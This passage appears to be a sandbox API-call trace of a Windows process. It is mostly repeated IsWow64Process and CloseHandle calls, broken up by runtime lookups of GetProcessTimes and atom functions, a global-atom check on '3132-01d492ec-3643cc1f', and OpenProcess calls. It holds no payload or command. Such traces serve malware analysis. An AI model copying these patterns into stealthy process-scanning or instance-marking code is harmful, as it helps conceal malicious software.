	[0125.057] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.057] CloseHandle (hObject=0x69c) returned 1
	[0125.057] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.057] CloseHandle (hObject=0x69c) returned 1
	[0125.057] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.057] CloseHandle (hObject=0x69c) returned 1
	[0125.058] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.058] CloseHandle (hObject=0x69c) returned 1
	[0125.090] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.091] CloseHandle (hObject=0x69c) returned 1
	[0125.091] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.091] CloseHandle (hObject=0x69c) returned 1
	[0125.091] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.091] CloseHandle (hObject=0x69c) returned 1
	[0125.091] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.091] CloseHandle (hObject=0x69c) returned 1
	[0125.091] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.091] CloseHandle (hObject=0x69c) returned 1
	[0125.092] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.092] CloseHandle (hObject=0x69c) returned 1
	[0125.092] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.092] CloseHandle (hObject=0x69c) returned 1
	[0125.092] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.092] CloseHandle (hObject=0x69c) returned 1
	[0125.092] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.092] CloseHandle (hObject=0x69c) returned 1
	[0125.093] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.093] CloseHandle (hObject=0x69c) returned 1
	[0125.093] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.093] CloseHandle (hObject=0x69c) returned 1
	[0125.093] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.093] CloseHandle (hObject=0x69c) returned 1
	[0125.093] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.093] CloseHandle (hObject=0x69c) returned 1
	[0125.111] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.111] CloseHandle (hObject=0x69c) returned 1
	[0125.112] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.112] CloseHandle (hObject=0x69c) returned 1
	[0125.112] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.112] CloseHandle (hObject=0x69c) returned 1
	[0125.112] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.112] CloseHandle (hObject=0x69c) returned 1
	[0125.112] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.112] CloseHandle (hObject=0x69c) returned 1
	[0125.112] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.113] CloseHandle (hObject=0x69c) returned 1
	[0125.113] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.113] CloseHandle (hObject=0x69c) returned 1
	[0125.113] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.113] CloseHandle (hObject=0x69c) returned 1
	[0125.114] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.114] CloseHandle (hObject=0x69c) returned 1
	[0125.114] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.114] CloseHandle (hObject=0x69c) returned 1
	[0125.114] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.114] CloseHandle (hObject=0x69c) returned 1
	[0125.114] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.114] CloseHandle (hObject=0x69c) returned 1
	[0125.114] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.115] CloseHandle (hObject=0x69c) returned 1
	[0125.115] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.115] CloseHandle (hObject=0x69c) returned 1
	[0125.115] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.115] CloseHandle (hObject=0x69c) returned 1
	[0125.115] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.115] CloseHandle (hObject=0x69c) returned 1
	[0125.115] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.115] CloseHandle (hObject=0x69c) returned 1
	[0125.116] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.116] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.116] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.116] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.117] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.117] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.117] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.117] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.117] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.117] CloseHandle (hObject=0x69c) returned 1
	[0125.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.118] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.118] CloseHandle (hObject=0x69c) returned 1
	[0125.118] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.118] CloseHandle (hObject=0x69c) returned 1
	[0125.118] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.120] CloseHandle (hObject=0x69c) returned 1
	[0125.120] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.120] CloseHandle (hObject=0x69c) returned 1
	[0125.120] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.120] CloseHandle (hObject=0x69c) returned 1
	[0125.155] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.155] CloseHandle (hObject=0x69c) returned 1
	[0125.155] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.155] CloseHandle (hObject=0x69c) returned 1
	[0125.156] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.156] CloseHandle (hObject=0x69c) returned 1
	[0125.156] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.156] CloseHandle (hObject=0x69c) returned 1
	[0125.156] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.156] CloseHandle (hObject=0x69c) returned 1
	[0125.156] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.156] CloseHandle (hObject=0x69c) returned 1
	[0125.157] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.157] CloseHandle (hObject=0x69c) returned 1
	[0125.157] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.157] CloseHandle (hObject=0x69c) returned 1
	[0125.157] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.157] CloseHandle (hObject=0x69c) returned 1
	[0125.157] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.157] CloseHandle (hObject=0x69c) returned 1
	[0125.157] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.158] CloseHandle (hObject=0x69c) returned 1
	[0125.158] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.158] CloseHandle (hObject=0x69c) returned 1
	[0125.158] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.158] CloseHandle (hObject=0x69c) returned 1
	[0125.158] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.158] CloseHandle (hObject=0x69c) returned 1
	[0125.158] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.158] CloseHandle (hObject=0x69c) returned 1
	[0125.159] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.159] CloseHandle (hObject=0x69c) returned 1
	[0125.159] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.159] CloseHandle (hObject=0x69c) returned 1
	[0125.159] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.159] CloseHandle (hObject=0x69c) returned 1
	[0125.159] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.159] CloseHandle (hObject=0x69c) returned 1
	[0125.159] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.159] CloseHandle (hObject=0x69c) returned 1
	[0125.160] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.160] CloseHandle (hObject=0x69c) returned 1
	[0125.160] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.160] CloseHandle (hObject=0x69c) returned 1
	[0125.160] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.160] CloseHandle (hObject=0x69c) returned 1
	[0125.160] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.160] CloseHandle (hObject=0x69c) returned 1
	[0125.161] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.161] CloseHandle (hObject=0x69c) returned 1
	[0125.161] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.161] CloseHandle (hObject=0x69c) returned 1
	[0125.161] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.161] CloseHandle (hObject=0x69c) returned 1
	[0125.161] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.161] CloseHandle (hObject=0x69c) returned 1
	[0125.161] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.162] CloseHandle (hObject=0x69c) returned 1
	[0125.162] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.162] CloseHandle (hObject=0x69c) returned 1
	[0125.162] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.162] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.162] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.163] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.163] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.164] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.164] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.164] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.164] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.164] CloseHandle (hObject=0x69c) returned 1
	[0125.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.164] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.164] CloseHandle (hObject=0x69c) returned 1
	[0125.165] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.165] CloseHandle (hObject=0x69c) returned 1
	[0125.165] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.165] CloseHandle (hObject=0x69c) returned 1
	[0125.165] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.165] CloseHandle (hObject=0x69c) returned 1
	[0125.165] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.165] CloseHandle (hObject=0x69c) returned 1
	[0125.198] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.198] CloseHandle (hObject=0x69c) returned 1
	[0125.198] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.198] CloseHandle (hObject=0x69c) returned 1
	[0125.199] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.199] CloseHandle (hObject=0x69c) returned 1
	[0125.199] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.199] CloseHandle (hObject=0x69c) returned 1
	[0125.199] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.199] CloseHandle (hObject=0x69c) returned 1
	[0125.199] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.199] CloseHandle (hObject=0x69c) returned 1
	[0125.199] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.199] CloseHandle (hObject=0x69c) returned 1
	[0125.200] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.200] CloseHandle (hObject=0x69c) returned 1
	[0125.200] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.200] CloseHandle (hObject=0x69c) returned 1
	[0125.200] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.200] CloseHandle (hObject=0x69c) returned 1
	[0125.200] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.200] CloseHandle (hObject=0x69c) returned 1
	[0125.201] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.201] CloseHandle (hObject=0x69c) returned 1
	[0125.201] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.201] CloseHandle (hObject=0x69c) returned 1
	[0125.201] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.201] CloseHandle (hObject=0x69c) returned 1
	[0125.201] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.201] CloseHandle (hObject=0x69c) returned 1
	[0125.201] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.201] CloseHandle (hObject=0x69c) returned 1
	[0125.202] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.202] CloseHandle (hObject=0x69c) returned 1
	[0125.202] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.202] CloseHandle (hObject=0x69c) returned 1
	[0125.202] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.202] CloseHandle (hObject=0x69c) returned 1
	[0125.202] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.208] CloseHandle (hObject=0x69c) returned 1
	[0125.208] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.208] CloseHandle (hObject=0x69c) returned 1
	[0125.208] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.208] CloseHandle (hObject=0x69c) returned 1
	[0125.209] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.209] CloseHandle (hObject=0x69c) returned 1
	[0125.209] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.209] CloseHandle (hObject=0x69c) returned 1
	[0125.209] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.209] CloseHandle (hObject=0x69c) returned 1
	[0125.209] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.209] CloseHandle (hObject=0x69c) returned 1
	[0125.210] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.210] CloseHandle (hObject=0x69c) returned 1
	[0125.210] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.210] CloseHandle (hObject=0x69c) returned 1
	[0125.210] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.210] CloseHandle (hObject=0x69c) returned 1
	[0125.211] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.211] CloseHandle (hObject=0x69c) returned 1
	[0125.211] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.211] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.211] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.212] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.212] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.212] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.212] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.212] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.212] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0125.213] CloseHandle (hObject=0x69c) returned 1
	[0125.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0125.213] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.213] CloseHandle (hObject=0x69c) returned 1
	[0125.213] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.213] CloseHandle (hObject=0x69c) returned 1
	[0125.213] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.213] CloseHandle (hObject=0x69c) returned 1
	[0125.213] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.213] CloseHandle (hObject=0x69c) returned 1
	[0125.214] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.214] CloseHandle (hObject=0x69c) returned 1
	[0125.256] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.256] CloseHandle (hObject=0x69c) returned 1
	[0125.257] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.257] CloseHandle (hObject=0x69c) returned 1
	[0125.257] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.257] CloseHandle (hObject=0x69c) returned 1
	[0125.257] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.257] CloseHandle (hObject=0x69c) returned 1
	[0125.257] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.257] CloseHandle (hObject=0x69c) returned 1
	[0125.257] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.258] CloseHandle (hObject=0x69c) returned 1
	[0125.258] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.258] CloseHandle (hObject=0x69c) returned 1
	[0125.258] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.258] CloseHandle (hObject=0x69c) returned 1
	[0125.259] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.259] CloseHandle (hObject=0x69c) returned 1
	[0125.259] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.259] CloseHandle (hObject=0x69c) returned 1
	[0125.259] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.259] CloseHandle (hObject=0x69c) returned 1
	[0125.259] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.259] CloseHandle (hObject=0x69c) returned 1
	[0125.259] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.259] CloseHandle (hObject=0x69c) returned 1
	[0125.260] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.260] CloseHandle (hObject=0x69c) returned 1
	[0125.260] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.260] CloseHandle (hObject=0x69c) returned 1
	[0125.260] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.260] CloseHandle (hObject=0x69c) returned 1
	[0125.260] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.260] CloseHandle (hObject=0x69c) returned 1
	[0125.260] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.260] CloseHandle (hObject=0x69c) returned 1
	[0125.261] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.261] CloseHandle (hObject=0x69c) returned 1
	[0125.261] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.261] CloseHandle (hObject=0x69c) returned 1
	[0125.261] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.261] CloseHandle (hObject=0x69c) returned 1
	[0125.261] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.261] CloseHandle (hObject=0x69c) returned 1
	[0125.261] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.261] CloseHandle (hObject=0x69c) returned 1
	[0125.262] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.262] CloseHandle (hObject=0x69c) returned 1
	[0125.262] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.262] CloseHandle (hObject=0x69c) returned 1
	[0125.262] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.262] CloseHandle (hObject=0x69c) returned 1
	[0125.262] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.262] CloseHandle (hObject=0x69c) returned 1
	[0125.262] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.262] CloseHandle (hObject=0x69c) returned 1
	[0125.263] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.263] CloseHandle (hObject=0x69c) returned 1
	[0125.263] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0125.263] CloseHandle (hObject=0x69c) returned 1
	[0125.263] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.263] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0125.263] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0125.264] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.264] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0125.264] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0125.265] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0125.265] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0125.265] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
